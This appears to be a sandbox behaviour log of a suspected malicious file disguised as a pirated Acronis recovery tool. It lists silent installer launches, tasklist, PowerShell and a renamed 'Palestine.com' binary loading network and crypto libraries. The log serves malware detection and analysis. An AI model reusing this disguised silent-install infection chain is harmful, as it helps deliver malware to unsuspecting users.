                Source: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exeProcess created: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp "C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp" /SL5="$6036C,17641136,845824,C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpProcess created: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe "C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe" /VERYSILENT
                Source: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exeProcess created: C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp "C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp" /SL5="$80362,17641136,845824,C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe" /VERYSILENT
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: napinsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: wshbth.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: nlaapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: winrnr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: napinsp.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: pnrpnsp.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: wshbth.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: nlaapi.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: winrnr.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: webio.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: schannel.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: dpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: wbemcomn.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: amsi.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comSection loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: zipfldr.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
